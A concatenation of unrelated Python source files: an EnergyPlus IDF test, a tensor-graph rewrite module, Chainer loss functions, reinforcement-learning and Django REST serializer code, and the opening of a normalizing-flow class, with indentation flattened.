obj.availability_schedule_name = var_availability_schedule_name
# real
var_rated_capacity = 0.0
obj.rated_capacity = var_rated_capacity
# real
var_rated_gas_use_rate = 0.0
obj.rated_gas_use_rate = var_rated_gas_use_rate
# real
var_thermal_efficiency = 0.50005
obj.thermal_efficiency = var_thermal_efficiency
# object-list
var_thermal_efficiency_modifier_curve_name = "object-list|Thermal Efficiency Modifier Curve Name"
obj.thermal_efficiency_modifier_curve_name = var_thermal_efficiency_modifier_curve_name
# real
var_rated_fan_power = 0.0
obj.rated_fan_power = var_rated_fan_power
# real
var_auxiliary_electric_power = 0.0
obj.auxiliary_electric_power = var_auxiliary_electric_power
# node
var_air_inlet_node_name = "node|Air Inlet Node Name"
obj.air_inlet_node_name = var_air_inlet_node_name
# node
var_air_outlet_node_name = "node|Air Outlet Node Name"
obj.air_outlet_node_name = var_air_outlet_node_name
# object-list
var_water_storage_tank_name = "object-list|Water Storage Tank Name"
obj.water_storage_tank_name = var_water_storage_tank_name
# alpha
var_inlet_water_temperature_option = "FixedInletWaterTemperature"
obj.inlet_water_temperature_option = var_inlet_water_temperature_option
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.humidifiersteamgass[0].name, var_name)
self.assertEqual(idf2.humidifiersteamgass[0].availability_schedule_name, var_availability_schedule_name)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].rated_capacity, var_rated_capacity)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].rated_gas_use_rate, var_rated_gas_use_rate)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].thermal_efficiency, var_thermal_efficiency)
self.assertEqual(idf2.humidifiersteamgass[0].thermal_efficiency_modifier_curve_name, var_thermal_efficiency_modifier_curve_name)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].rated_fan_power, var_rated_fan_power)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].auxiliary_electric_power, var_auxiliary_electric_power)
self.assertEqual(idf2.humidifiersteamgass[0].air_inlet_node_name, var_air_inlet_node_name)
self.assertEqual(idf2.humidifiersteamgass[0].air_outlet_node_name, var_air_outlet_node_name)
self.assertEqual(idf2.humidifiersteamgass[0].water_storage_tank_name, var_water_storage_tank_name)
self.assertEqual(idf2.humidifiersteamgass[0].inlet_water_temperature_option, var_inlet_water_temperature_option)
|
38351
|
import attr
from attr import attrib, s
from typing import Tuple, List, Optional, Callable, Mapping, Union, Set
from collections import defaultdict
from ..tensor import Operator
@attr.s(auto_attribs=True)
class GOp:
cost : float
size : Tuple[int]
alias : Tuple[int]
args : Tuple['GTensor']
result : Tuple['GTensor']
name : str
meta : dict
def __attrs_post_init__(self):
assert len(self.size) == len(self.alias) == len(self.result)
for i in range(len(self.size)):
assert self.alias[i] == -1 or self.size[i] == 0
def is_aliasing(self) -> bool:
return any([a >= 0 for a in self.alias])
def all_aliasing(self) -> bool:
return all([a >= 0 for a in self.alias])
def is_tuple(self) -> bool:
return len(self.result) > 1
def __str__(self): return self.name
@staticmethod
def make(g : 'Graph',
args : Tuple['GTensor'],
cost : float,
size : Tuple[int],
alias : Tuple[int],
name : str,
res_names : Tuple[str],
meta : dict,
make_uname : bool = True) -> ('GOp', Tuple['GTensor']):
assert len(size) == len(alias) == len(res_names)
uname = '{}/{}'.format(name, g._next_id()) if make_uname else name
result = tuple([GTensor(None, i, res_names[i], None) for i in range(len(res_names))])
op = GOp(cost, size, alias, args, result, uname, meta)
for r in result:
r.op = op
r.storage_size = r.size() if not r.alias() else r.alias().storage_size
assert r.storage_size is not None
g.add_op(op)
return op, result
GOp.CONST_NAME = 'constant'
@attr.s(auto_attribs=True)
class GTensor:
op : 'GOp'
index : int
name : str
storage_size : int
meta : dict = attrib(factory=dict)
def size(self) -> int:
return self.op.size[self.index]
def alias(self) -> Optional['GTensor']:
a = self.op.alias[self.index]
return self.op.args[a] if a >= 0 else None
def __str__(self): return self.name
@attr.s(auto_attribs=True)
class GCompute:
op : 'GOp'
def __str__(self):
return '({},)=Compute({})'.format(
','.join([r.name for r in self.op.result]),
self.op.name
)
@attr.s(auto_attribs=True)
class GGet:
tensor : 'GTensor'
pin : bool
def __str__(self):
op = 'Pin' if self.pin else 'Get'
return '{}({})'.format(op, self.tensor.name)
@attr.s(auto_attribs=True)
class GRelease:
tensor : 'GTensor'
def __str__(self):
return 'Release({})'.format(self.tensor.name)
class Graph:
def __init__(self):
self._id : int = 0
self.schedule : List[Union['GCompute', 'GGet', 'GRelease']] = []
self.ops : Mapping[str, 'GOp'] = {}
self.fwd_ops : Mapping[str, 'GOp'] = {}
self.bwd_ops : Mapping[str, 'GOp'] = {}
self.tensors : Mapping[str, 'GTensor'] = {}
self.op_children : Mapping[str, Set[str]] = defaultdict(set)
self.op_parents : Mapping[str, Set[str]] = defaultdict(set)
self.meta = {
'compute': 0
}
def _next_id(self) -> int:
i = self._id
self._id += 1
return i
def add_op(self, op : 'GOp') -> None:
assert op.name not in self.ops
self.ops[op.name] = op
if op.meta.get('bwd', False):
self.bwd_ops[op.name] = op
else:
self.fwd_ops[op.name] = op
for ti in op.args:
assert ti.name in self.tensors
op_parents = set([ti.op.name for ti in op.args])
for ps in op_parents:
self.op_children[ps].add(op.name)
self.op_parents[op.name] = op_parents
for to in op.result:
assert to.name not in self.tensors
self.tensors[to.name] = to
self.meta['compute'] += op.cost
# returns op names, not ops
def ops_topological(self) -> List[str]:
visited = {v : False for v in self.ops}
stack = []
def visit(v):
visited[v] = True
for u in self.op_children[v]:
if not visited[u]:
visit(u)
stack.insert(0, v)
for v in self.ops:
if not visited[v]:
visit(v)
return stack
def get_closure(self) -> Callable[['Runtime'], None]:
def f(rt):
tensor_map = {}
for cmd in self.schedule:
if isinstance(cmd, GCompute):
# TODO: add a rematerialize cmd? this assumes once-compute only
for x in cmd.op.args:
assert x.name in tensor_map
args = [tensor_map[x.name] for x in cmd.op.args]
rt_op = Operator(
cmd.op.cost,
cmd.op.size,
cmd.op.alias,
cmd.op.name
)
res = rt.compute(args, rt_op, names=tuple([o.name for o in cmd.op.result]))
for i, r in enumerate(res):
assert cmd.op.result[i].name not in tensor_map
tensor_map[cmd.op.result[i].name] = r
elif isinstance(cmd, GGet):
assert cmd.tensor.name in tensor_map
t = tensor_map[cmd.tensor.name]
if cmd.pin:
if not t.defined:
rt.rematerialize(t)
assert t.defined
rt.pin(t)
else:
rt.get(t)
elif isinstance(cmd, GRelease):
assert cmd.tensor.name in tensor_map
rt.release(tensor_map[cmd.tensor.name])
return f
def rewrite_collapse_aliases(g : 'Graph') -> 'Graph':
g_r = Graph()
g_r.meta = g.meta.copy()
g_r.meta['compute'] = 0
ops_topological = g.ops_topological()
# maps old -> new
tensor_map : Mapping[str, 'GTensor'] = {}
op_map : Mapping[str, 'GOp'] = {}
for op_name in ops_topological:
op = g.ops[op_name]
if op.is_aliasing():
if not op.all_aliasing():
raise RuntimeError(
'cannot collapse aliases, {} is not all aliasing'
.format(op)
)
for r in op.result:
tensor_map[r.name] = tensor_map[r.alias().name]
else:
# keep operator
args = [tensor_map[x.name] for x in op.args]
op_new, res = GOp.make(
g_r, args, op.cost, op.size, op.alias,
op.name, tuple([o.name for o in op.result]), op.meta,
make_uname=False
)
for r in res:
tensor_map[r.name] = r
op_map[op.name] = op_new
# rewrite schedule
for cmd in g.schedule:
if isinstance(cmd, GCompute):
if cmd.op.name in op_map:
g_r.schedule.append(GCompute(op_map[cmd.op.name]))
else:
# aliasing op; increase refcount
for r in cmd.op.result:
g_r.schedule.append(GGet(tensor_map[r.name], pin=False))
elif isinstance(cmd, GGet):
g_r.schedule.append(GGet(tensor_map[cmd.tensor.name], pin=cmd.pin))
elif isinstance(cmd, GRelease):
g_r.schedule.append(GRelease(tensor_map[cmd.tensor.name]))
g_r.meta['no_aliases'] = True
g_r.meta['tensor_map'] = {old: new.name for old, new in tensor_map.items()}
g_r.meta['op_map'] = {old: new.name for old, new in op_map.items()}
return g_r
def rewrite_merge_tuples(g : 'Graph') -> 'Graph':
g_r = Graph()
g_r.meta = g.meta.copy()
g_r.meta['compute'] = 0
ops_topological = g.ops_topological()
# maps old -> new
tensor_map : Mapping[str, 'GTensor'] = {}
op_map : Mapping[str, 'GOp'] = {}
for op_name in ops_topological:
op = g.ops[op_name]
assert not op.is_aliasing()
if op.is_tuple():
args = tuple([tensor_map[x.name] for x in op.args])
op_new, res = GOp.make(
g_r, args, op.cost, (sum(op.size),), (-1,),
op.name, ('+'.join([o.name for o in op.result]),), op.meta,
make_uname=False
)
for r in op.result:
tensor_map[r.name] = res[0]
op_map[op.name] = op_new
else:
# keep
args = [tensor_map[x.name] for x in op.args]
op_new, res = GOp.make(
g_r, args, op.cost, op.size, op.alias,
op.name, (op.result[0].name,), op.meta,
make_uname=False
)
tensor_map[res[0].name] = res[0]
op_map[op.name] = op_new
for cmd in g.schedule:
if isinstance(cmd, GCompute):
op_new = op_map[cmd.op.name]
g_r.schedule.append(GCompute(op_new))
# need to get more refs for each missing tuple output
for _ in range(len(cmd.op.result) - 1):
g_r.schedule.append(GGet(op_new.result[0], pin=False))
elif isinstance(cmd, GGet):
g_r.schedule.append(GGet(tensor_map[cmd.tensor.name], pin=cmd.pin))
elif isinstance(cmd, GRelease):
g_r.schedule.append(GRelease(tensor_map[cmd.tensor.name]))
g_r.meta['no_tuples'] = True
g_r.meta['tensor_map'] = {old: new.name for old, new in tensor_map.items()}
g_r.meta['op_map'] = {old: new.name for old, new in op_map.items()}
return g_r
def rewrite_constant_elim(g : 'Graph') -> 'Graph':
if not g.meta.get('no_aliases', False):
raise RuntimeError('cannot eliminate constants, input graph may have aliases')
g_r = Graph()
g_r.meta = g.meta.copy()
compute_pre = g_r.meta['compute']
g_r.meta['compute'] = 0
g_r.meta['constant_ram'] = 0
ops_topological = g.ops_topological()
# maps old -> new
tensor_map : Mapping[str, 'GTensor'] = {}
op_map : Mapping[str, 'GOp'] = {}
for op_name in ops_topological:
op = g.ops[op_name]
if op_name.split('/')[0] == GOp.CONST_NAME:
args = [tensor_map[x.name] for x in op.args]
assert len(args) == 0
g_r.meta['constant_ram'] += sum(op.size)
else:
# keep operator
args = [tensor_map[x.name] for x in op.args if x.name in tensor_map]
op_new, res = GOp.make(
g_r, args, op.cost, op.size, op.alias,
op.name, tuple([o.name for o in op.result]), op.meta,
make_uname=False
)
for r in res:
tensor_map[r.name] = r
op_map[op.name] = op_new
for cmd in g.schedule:
if isinstance(cmd, GCompute):
if cmd.op.name in op_map:
op_new = op_map[cmd.op.name]
g_r.schedule.append(GCompute(op_new))
elif isinstance(cmd, GGet):
if cmd.tensor.name in tensor_map:
g_r.schedule.append(GGet(tensor_map[cmd.tensor.name], pin=cmd.pin))
elif isinstance(cmd, GRelease):
if cmd.tensor.name in tensor_map:
g_r.schedule.append(GRelease(tensor_map[cmd.tensor.name]))
g_r.meta['no_constants'] = True
g_r.meta['tensor_map'] = {old: new.name for old, new in tensor_map.items()}
g_r.meta['op_map'] = {old: new.name for old, new in op_map.items()}
assert compute_pre == g_r.meta['compute']
return g_r
def rewrite_checkmate(g : 'Graph') -> 'Graph':
g_r = rewrite_collapse_aliases(g)
g_r = rewrite_merge_tuples(g_r)
g_r = rewrite_constant_elim(g_r)
return g_r
|
38375
|
import os
from libdotfiles.util import (
HOME_DIR,
PKG_DIR,
REPO_ROOT_DIR,
create_symlink,
run,
)
create_symlink(
PKG_DIR / "launcher.json", HOME_DIR / ".config" / "launcher.json"
)
os.chdir(REPO_ROOT_DIR / "opt" / "launcher")
run(
["python3", "-m", "pip", "install", "--user", "--upgrade", "."],
check=False,
)
|
38403
|
from __future__ import absolute_import
from chainer import backend
from chainer import functions as F
from chainer.functions import sigmoid_cross_entropy
from chainer.functions import softmax_cross_entropy
from .sigmoid_soft_cross_entropy import sigmoid_soft_cross_entropy
def noised_softmax_cross_entropy(y, t, mc_iteration,
normalize=True, cache_score=True, class_weight=None,
ignore_label=-1, reduce='mean', enable_double_backprop=False):
""" Softmax Cross-entropy for aleatoric uncertainty estimates.
See: https://arxiv.org/pdf/1703.04977.pdf
Args:
y (list of ~chainer.Variable): logits and sigma
t (~numpy.ndarray or ~cupy.ndarray): ground-truth
mc_iteration (int): number of iteration of MCMC.
normalize (bool, optional): Defaults to True.
reduce (str, optional): Defaults to 'mean'.
Returns:
[~chainer.Variable]: Loss value.
"""
assert isinstance(y, (list, tuple))
logits, log_std = y
assert logits.shape[0] == log_std.shape[0]
assert log_std.shape[1] in (logits.shape[1], 1)
assert logits.shape[2:] == log_std.shape[2:]
xp = backend.get_array_module(t)
# std = F.sqrt(F.exp(log_var))
std = F.exp(log_std)
loss = 0.
for _ in range(mc_iteration):
noise = std * xp.random.normal(0., 1., std.shape)
loss += softmax_cross_entropy(logits + noise, t,
normalize=False,
cache_score=cache_score,
class_weight=class_weight,
ignore_label=ignore_label,
reduce='no',
enable_double_backprop=enable_double_backprop)
if not reduce == 'mean':
return loss
if normalize:
count = loss.size * mc_iteration
else:
count = max(1, len(loss)) * mc_iteration
return F.sum(loss) / count
def noised_sigmoid_cross_entropy(y, t, mc_iteration, normalize=True, reduce='mean'):
""" Sigmoid Cross-entropy for aleatoric uncertainty estimates.
Args:
y (list of ~chainer.Variable): logits and sigma
t (~numpy.ndarray or ~cupy.ndarray): ground-truth
mc_iteration (int): number of iteration of MCMC.
normalize (bool, optional): Defaults to True.
reduce (str, optional): Defaults to 'mean'.
Returns:
[~chainer.Variable]: Loss value.
"""
assert isinstance(y, (list, tuple))
logits, log_std = y
assert logits.shape[0] == log_std.shape[0]
assert log_std.shape[1] in (logits.shape[1], 1)
assert logits.shape[2:] == log_std.shape[2:]
assert logits.shape == t.shape
xp = backend.get_array_module(t)
# std = F.sqrt(F.exp(log_var))
std = F.exp(log_std)
loss = 0.
for _ in range(mc_iteration):
noise = std * xp.random.normal(0., 1., std.shape)
loss += sigmoid_cross_entropy(logits + noise, t,
normalize=False,
reduce='no')
if not reduce == 'mean':
return loss
if normalize:
count = loss.size * mc_iteration
else:
count = max(1, len(loss)) * mc_iteration
return F.sum(loss) / count
def noised_sigmoid_soft_cross_entropy(y, t, mc_iteration, normalize=True, reduce='mean'):
""" Sigmoid Soft Cross-entropy for aleatoric uncertainty estimates.
Args:
y (list of ~chainer.Variable): logits and sigma
t (~numpy.ndarray or ~cupy.ndarray): ground-truth
mc_iteration (int): number of iteration of MCMC.
normalize (bool, optional): Defaults to True.
reduce (str, optional): Defaults to 'mean'.
Returns:
[~chainer.Variable]: Loss value.
"""
assert isinstance(y, (list, tuple))
logits, log_std = y
assert logits.shape == log_std.shape
assert logits.shape == t.shape
xp = backend.get_array_module(t)
# std = F.sqrt(F.exp(log_var))
std = F.exp(log_std)
loss = 0.
for _ in range(mc_iteration):
noise = std * xp.random.normal(0., 1., std.shape)
loss += sigmoid_soft_cross_entropy(logits + noise, t,
normalize=False,
reduce='no')
if not reduce == 'mean':
return loss
if normalize:
count = loss.size * mc_iteration
else:
count = max(1, len(loss)) * mc_iteration
return F.sum(loss) / count
|
38430
|
import numpy as np
import json
import cPickle
import matplotlib.pyplot as plt
from theano import config
import matplotlib.cm as cmx
import matplotlib.colors as colors
from sklearn.metrics import roc_curve
from utils.loader import load_train_data
from utils.config_name_creator import *
from utils.data_scaler import scale_across_features, scale_across_time
from cnn.conv_net import ConvNet
config.floatX = 'float32'
def get_cmap(N):
color_norm = colors.Normalize(vmin=0, vmax=N - 1)
scalar_map = cmx.ScalarMappable(norm=color_norm, cmap='hsv')
def map_index_to_rgb_color(index):
return scalar_map.to_rgba(index)
return map_index_to_rgb_color
def plot_train_probs(subject, data_path, model_path):
with open(model_path + '/' + subject + '.pickle', 'rb') as f:
state_dict = cPickle.load(f)
cnn = ConvNet(state_dict['params'])
cnn.set_weights(state_dict['weights'])
scalers = state_dict['scalers']
d = load_train_data(data_path, subject)
x, y = d['x'], d['y']
x, _ = scale_across_time(x, x_test=None, scalers=scalers) if state_dict['params']['scale_time'] \
else scale_across_features(x, x_test=None, scalers=scalers)
cnn.batch_size.set_value(x.shape[0])
probs = cnn.get_test_proba(x)
fpr, tpr, threshold = roc_curve(y, probs)
c = np.sqrt((1-tpr)**2+fpr**2)
opt_threshold = threshold[np.where(c==np.min(c))[0]]
print opt_threshold
x_coords = np.zeros(len(y), dtype='float64')
rng = np.random.RandomState(42)
x_coords += rng.normal(0.0, 0.08, size=len(x_coords))
plt.scatter(x_coords, probs, c=y, s=60)
plt.title(subject)
plt.show()
if __name__ == '__main__':
with open('SETTINGS.json') as f:
settings_dict = json.load(f)
data_path = settings_dict['path']['processed_data_path'] + '/' + create_fft_data_name(settings_dict)
model_path = settings_dict['path']['model_path'] + '/' + create_cnn_model_name(settings_dict)
subjects = ['Patient_1', 'Patient_2', 'Dog_1', 'Dog_2', 'Dog_3', 'Dog_4', 'Dog_5']
for subject in subjects:
print '***********************', subject, '***************************'
plot_train_probs(subject, data_path, model_path)
|
38460
|
from pywizard.userSettings import settings
import scipy as sp
class PreEmphasizer(object):
@classmethod
def processBuffer(cls, buf):
preEnergy = buf.energy()
alpha = cls.alpha()
unmodifiedPreviousSample = buf.samples[0]
tempSample = None
first_sample = buf.samples[0]
buf.samples = buf.samples[1:] + (buf.samples[:-1] * alpha)
buf.samples = sp.insert(buf.samples, 0, first_sample)
cls.scaleBuffer(buf, preEnergy, buf.energy())
@classmethod
def alpha(cls):
return settings.preEmphasisAlpha
@classmethod
def scaleBuffer(cls, buf, preEnergy, postEnergy):
scale = sp.sqrt(preEnergy / postEnergy)
buf.samples *= scale
|
38490
|
import torch
import torch.nn.functional as F
from agent.td3 import TD3
class TD3MT(TD3):
def __init__(self,
state_dim,
action_dim,
max_action,
num_env,
discount=0.99,
tau=0.005,
policy_noise=0.2,
noise_clip=0.5,
policy_freq=2,
cuda_index=None
):
super().__init__(state_dim, action_dim, max_action,
discount, tau,
policy_noise, noise_clip,
policy_freq, cuda_index)
self.it = 0
self.total_it = [0 for _ in range(num_env)]
self.state_dim = state_dim
self.action_dim = action_dim
self.actor_optimizer_online = torch.optim.Adam(self.actor.parameters(), lr=3e-4)
self.critic_optimizer_online = torch.optim.Adam(self.critic.parameters(), lr=3e-4)
def save(self, filename):
super().save(filename)
torch.save(self.actor_optimizer_online.state_dict(), filename + "_actor_optimizer_online.pt")
torch.save(self.critic_optimizer_online.state_dict(), filename + "_critic_optimizer_online.pt")
def load(self, filename):
super().load(filename)
self.actor_optimizer_online.load_state_dict(torch.load(filename + "_actor_optimizer_online.pt"))
self.critic_optimizer_online.load_state_dict(torch.load(filename + "_critic_optimizer_online.pt"))
def pad_state(self, state):
return torch.cat([state,
torch.zeros(state.shape[0], self.state_dim - state.shape[1]).to(self.device)],
dim=1)
def pad_action(self, action):
return torch.cat([action,
torch.zeros(action.shape[0], self.action_dim - action.shape[1]).to(self.device)],
dim=1)
def train_mt(self, idx, teacher, replay, batch_size=100, is_offline=True):
self.total_it[idx] += 1
state, action, next_state, reward, not_done = replay.sample(batch_size)
state_dim_org = state.shape[1]
action_dim_org = action.shape[1]
with torch.no_grad():
state_pad = self.pad_state(state)
action_pad = self.pad_action(action)
if is_offline:
teacher_q1, teacher_q2 = teacher.critic(state, action)
else:
next_state_pad = self.pad_state(next_state)
next_action = self.actor_target(next_state_pad)
noise = (
torch.rand_like(next_action) * self.policy_noise
).clamp(-self.noise_clip, self.noise_clip)
next_action = (next_action + noise).clamp(-self.max_action, self.max_action)
next_action = next_action[:, :action_dim_org]
next_action_pad = self.pad_action(next_action)
target_q1, target_q2 = self.critic_target(next_state_pad, next_action_pad)
target_q = torch.min(target_q1, target_q2)
target_q = reward + not_done * self.discount * target_q
current_q1, current_q2 = self.critic(state_pad, action_pad)
if is_offline:
critic_loss = F.mse_loss(current_q1, teacher_q1) + F.mse_loss(current_q2, teacher_q2)
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
else:
critic_loss = F.mse_loss(current_q1, target_q) + F.mse_loss(current_q2, target_q)
self.critic_optimizer_online.zero_grad()
critic_loss.backward()
self.critic_optimizer_online.step()
loss = [None, critic_loss.cpu().data.numpy()]
if is_offline or self.total_it[idx] % self.policy_freq == 0:
current_action = self.actor(state_pad)[:, :action_dim_org]
current_action_pad = self.pad_action(current_action)
actor_loss_t = -teacher.critic.Q1(state, current_action)
if is_offline:
actor_loss = actor_loss_t.mean()
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
else:
actor_loss = -self.critic.Q1(state_pad, current_action_pad)
actor_loss = 1.0 * actor_loss + 1.0 * actor_loss_t
actor_loss = actor_loss.mean()
self.actor_optimizer_online.zero_grad()
actor_loss.backward()
self.actor_optimizer_online.step()
self.update_target_network()
loss[0] = actor_loss.cpu().data.numpy()
return loss
|
38494
|
import tensorflow as tf
def get_record_parser_qqp(config, is_test=False):
def parse(example):
ques_limit = config.test_ques_limit if is_test else config.ques_limit
features = tf.parse_single_example(example,
features={
"ques1_idxs": tf.FixedLenFeature([], tf.string),
"ques2_idxs": tf.FixedLenFeature([], tf.string),
"label": tf.FixedLenFeature([], tf.string),
"id": tf.FixedLenFeature([], tf.int64)
})
ques1_idxs = tf.reshape(tf.decode_raw(
features["ques1_idxs"], tf.int32), [ques_limit + 2])
ques2_idxs = tf.reshape(tf.decode_raw(
features["ques2_idxs"], tf.int32), [ques_limit + 2])
label = tf.reshape(tf.decode_raw(
features["label"], tf.float32), [2])
qa_id = features["id"]
return ques1_idxs, ques2_idxs, label, qa_id
return parse
|
38544
|
from rest_framework import serializers
from projects.models import (
Project,
ProjectVolunteers,
ProjectVolunteersRegistration,
ProjectAttendees,
ProjectAttendeesRegistration,
ProjectDiscussion,
ProjectAnswerDiscussion,
ProjectHub,
)
class ProjectVolunteersRegistrationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ProjectVolunteersRegistration
fields = ('url', 'profile', 'project_volunteers', 'project_volunteers_ref')
def create(self, validated_data):
project_volunteers = ProjectVolunteers.objects.get(pk=validated_data['project_volunteers_ref'])
registration = ProjectVolunteersRegistration.objects.create(
project_volunteers=project_volunteers,
**validated_data
)
count = ProjectVolunteersRegistration.objects.filter(
project_volunteers=project_volunteers
).count()
project_volunteers.registered = count
project_volunteers.save()
return registration
class ProjectVolunteersSerializer(serializers.HyperlinkedModelSerializer):
volunteers_registration = ProjectVolunteersRegistrationSerializer(many=True, read_only=True)
class Meta:
model = ProjectVolunteers
fields = (
'url',
'id',
'project',
'role',
'description',
'seats',
'registered',
'minimum_registration',
'volunteers_registration',
)
read_only_fields = ('registered', 'project', 'id')
class ProjectAttendeesRegistrationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ProjectAttendeesRegistration
fields = ('url', 'profile', 'project_attendees', 'project_attendees_ref')
def create(self, validated_data):
project_attendees = ProjectAttendees.objects.get(pk=validated_data['project_attendees_ref'])
registration = ProjectAttendeesRegistration.objects.create(project_attendees=project_attendees, **validated_data)
count = ProjectAttendeesRegistration.objects.filter(project_attendees=project_attendees).count()
project_attendees.registered = count
project_attendees.save()
return registration
class ProjectAttendeesSerializer(serializers.HyperlinkedModelSerializer):
attendees_registration = ProjectAttendeesRegistrationSerializer(many=True, read_only=True)
class Meta:
model = ProjectAttendees
fields = (
'url',
'id',
'project',
'seats',
'registered',
'attendees_registration',
'minimum_registration',
)
read_only_fields = ('registered', 'project',)
class ProjectAnswerDiscussionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ProjectAnswerDiscussion
fields = ('url', 'id', 'discussion_ref', 'discussion', 'text', 'profile', 'created', 'updated')
read_only_fields = ('discussion', 'profile')
def create(self, validated_data):
project_discussion = ProjectDiscussion.objects.get(pk=validated_data['discussion_ref'])
answer = ProjectAnswerDiscussion.objects.create(discussion=project_discussion, **validated_data)
return answer
class ProjectDiscussionSerializer(serializers.HyperlinkedModelSerializer):
answer_discussion_project = ProjectAnswerDiscussionSerializer(many=True, read_only=True)
class Meta:
model = ProjectDiscussion
fields = (
'url',
'id',
'project',
'project_ref',
'title',
'text',
'profile',
'created',
'updated',
'answer_discussion_project',
)
read_only_fields = ('profile', 'project', 'id')
def create(self, validated_data):
project = Project.objects.get(pk=validated_data['project_ref'])
new_discussion = ProjectDiscussion.objects.create(project=project, **validated_data)
return new_discussion
class ProjectSerializer(serializers.HyperlinkedModelSerializer):
attendees = ProjectAttendeesSerializer()
volunteers = ProjectVolunteersSerializer(many=True)
discussion_project = ProjectDiscussionSerializer(many=True, read_only=True)
### cause of the error :
#serializers.HyperlinkedRelatedField(
# many=True,
# view_name='discussion_project',
# read_only=True
#)
class Meta:
model = Project
fields = ('url', 'id', 'name', 'start',
'end', 'description', 'category',
'sub_category', 'oth_category', 'oth_sub_cat','place_name', 'number', 'street',
'postal_code', 'city', 'organizer', 'created',
'updated', 'project_type', 'attendees',
'volunteers', 'discussion_project')
read_only_fields = ('organizer', 'id')
def create(self, validated_data):
attendees_data = validated_data.pop('attendees')
volunteers_data = validated_data.pop('volunteers')
new_project = Project.objects.create(**validated_data)
if validated_data['project_type'] == 'CO':
ProjectAttendees.objects.create(project=new_project, **attendees_data)
elif validated_data['project_type'] == 'CP':
for volunteer_data in volunteers_data:
ProjectVolunteers.objects.create(project=new_project, **volunteer_data)
else:
ProjectAttendees.objects.create(project=new_project, **attendees_data)
for volunteer_data in volunteers_data:
ProjectVolunteers.objects.create(project=new_project, **volunteer_data)
return new_project
class ProjectShortSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Project
fields = ('url', 'id', 'name', 'start', 'created', 'updated',)
class ProjectHubSerializer(serializers.HyperlinkedModelSerializer):
project = ProjectSerializer()
class Meta:
model = ProjectHub
fields = ('project', 'distance_km', 'lat', 'lng')
|
38561
|
import itertools
from typing import Any, Callable, Sequence, Tuple
import dill as pickle
import jax.numpy as np
import numpy as onp
import pandas as pd
from jax import grad, jit, ops, random
from jax.experimental.optimizers import Optimizer, adam
from pzflow import distributions
from pzflow.bijectors import Bijector_Info, InitFunction, Pytree
from pzflow.utils import build_bijector_from_info, gaussian_error_model
class Flow:
"""A normalizing flow that models tabular data.
Attributes
----------
data_columns : tuple
List of DataFrame columns that the flow expects/produces.
conditional_columns : tuple
List of DataFrame columns on which the flow is conditioned.
info : Any
Object containing any kind of info included with the flow.
Often describes the data the flow is trained on.
latent
The latent distribution of the normalizing flow.
Has it's own sample and log_prob methods.
"""
def __init__(
self,
data_columns: Sequence[str] = None,
bijector: Tuple[InitFunction, Bijector_Info] = None,
conditional_columns: Sequence[str] = None,
latent=None,
data_error_model: Callable = None,
condition_error_model: Callable = None,
autoscale_conditions: bool = True,
seed: int = 0,
info: Any = None,
file: str = None,
_dictionary: dict = None,
):
"""Instantiate a normalizing flow.
Note that while all of the init parameters are technically optional,
you must provide either data_columns and bijector OR file.
In addition, if a file is provided, all other parameters must be None.
Parameters
----------
data_columns : Sequence[str], optional
Tuple, list, or other container of column names.
These are the columns the flow expects/produces in DataFrames.
bijector : Bijector Call, optional
A Bijector call that consists of the bijector InitFunction that
initializes the bijector and the tuple of Bijector Info.
Can be the output of any Bijector, e.g. Reverse(), Chain(...), etc.
conditional_columns : Sequence[str], optional
Names of columns on which to condition the normalizing flow.
latent : distribution, optional
The latent distribution for the normalizing flow. Can be any of
the distributions from pzflow.distributions. If not provided,
a normal distribution is used with the number of dimensions
inferred.
data_error_model : Callable, optional
A callable that defines the error model for data variables.
data_error_model must take key, X, Xerr, nsamples as arguments where:
key is a jax rng key, e.g. jax.random.PRNGKey(0)
X is a 2 dimensional array of data variables, where the order
of variables matches the order of the columns in data_columns
Xerr is the corresponding 2 dimensional array of errors
nsamples is the number of samples to draw from the error distribution
data_error_model must return an array of samples with the shape
(X.shape[0], nsamples, X.shape[1]).
If data_error_model is not provided, a Gaussian error model is assumed.
condition_error_model : Callable, optional
A callable that defines the error model for conditional variables.
condition_error_model must take key, X, Xerr, nsamples as arguments where:
key is a jax rng key, e.g. jax.random.PRNGKey(0)
X is a 2 dimensional array of conditional variables, where the order
of variables matches the order of the columns in conditional_columns
Xerr is the corresponding 2 dimensional array of errors
nsamples is the number of samples to draw from the error distribution
condition_error_model must return an array of samples with the shape
(X.shape[0], nsamples, X.shape[1]).
If condition_error_model is not provided, a Gaussian error model is assumed.
autoscale_conditions : bool, default=True
Sets whether or not conditions are automatically standard scaled when
passed to a conditional flow. I recommend you leave this as True.
seed : int, default=0
The random seed for initial parameters
info : Any, optional
An object to attach to the info attribute.
file : str, optional
Path to file from which to load a pretrained flow.
If a file is provided, all other parameters must be None.
"""
# validate parameters
if (
data_columns is None
and bijector is None
and file is None
and _dictionary is None
):
raise ValueError("You must provide data_columns and bijector OR file.")
if data_columns is not None and bijector is None:
raise ValueError("Please also provide a bijector.")
if data_columns is None and bijector is not None:
raise ValueError("Please also provide data_columns.")
if any(
(
data_columns is not None,
bijector is not None,
conditional_columns is not None,
latent is not None,
data_error_model is not None,
condition_error_model is not None,
info is not None,
)
):
if file is not None:
raise ValueError(
"If providing a file, please do not provide any other parameters."
)
if _dictionary is not None:
raise ValueError(
"If providing a dictionary, please do not provide any other parameters."
)
if file is not None and _dictionary is not None:
raise ValueError("Only provide file or _dictionary, not both.")
# if file or dictionary is provided, load everything from it
if file is not None or _dictionary is not None:
save_dict = self._save_dict()
if file is not None:
with open(file, "rb") as handle:
save_dict.update(pickle.load(handle))
else:
save_dict.update(_dictionary)
if save_dict["class"] != self.__class__.__name__:
raise TypeError(
f"This save file isn't a {self.__class__.__name__}."
+ f"It is a {save_dict['class']}"
)
# load columns and dimensions
self.data_columns = save_dict["data_columns"]
